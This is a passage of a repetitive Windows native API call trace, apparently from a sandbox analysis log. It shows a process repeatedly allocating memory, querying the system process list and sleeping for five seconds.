ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.455] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.459] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.460] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.461] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.461] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.462] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.463] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.466] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.469] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.469] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.470] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.471] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.471] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.474] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.475] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.477] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.477] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.477] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.478] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.481] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.482] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.483] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.484] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.484] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.484] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.489] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.490] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.491] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.492] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.496] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.496] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.496] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.501] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.502] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.503] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.503] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.504] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.504] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.504] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.508] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.508] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.510] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.510] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.511] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.511] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.511] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.515] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.516] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.518] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.518] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.519] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.520] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.520] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.524] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.524] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.526] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.526] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.527] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.527] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.527] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.531] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.532] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.533] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.533] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.534] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.534] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.534] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.537] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.538] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.539] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.540] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.540] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.540] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.544] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.545] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.546] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.546] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.547] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.547] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.551] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.552] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.553] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.554] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.554] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.554] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.555] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.558] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.558] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.560] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.562] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.565] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.566] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.567] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.568] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.568] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.568] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.569] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.572] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.573] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.574] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.575] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.575] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.575] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.579] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.579] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.582] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.582] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.585] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.586] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.587] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.587] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.588] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.588] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.588] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.593] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.594] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.595] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.595] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.595] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.600] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.600] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.603] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0233.603] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0233.604] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0233.604] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0233.604] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0233.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0233.608] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0233.610] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 